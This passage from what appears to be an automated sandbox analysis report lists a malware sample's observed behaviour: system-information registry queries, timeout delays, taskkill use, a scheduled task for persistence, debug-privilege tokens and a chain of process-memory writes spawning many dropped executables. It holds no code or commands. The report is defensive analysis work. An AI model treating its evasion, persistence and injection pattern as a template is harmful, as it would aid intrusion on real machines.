Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856873749173507" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1752 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1752 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4972 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 4972 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 4972 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 4972 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4972 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4972 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4972 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 4972 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 4972 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 4972 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4972 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4972 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4596 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 4972 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
PID 4972 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
PID 4972 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4972 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4972 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4496 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
PID 4972 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
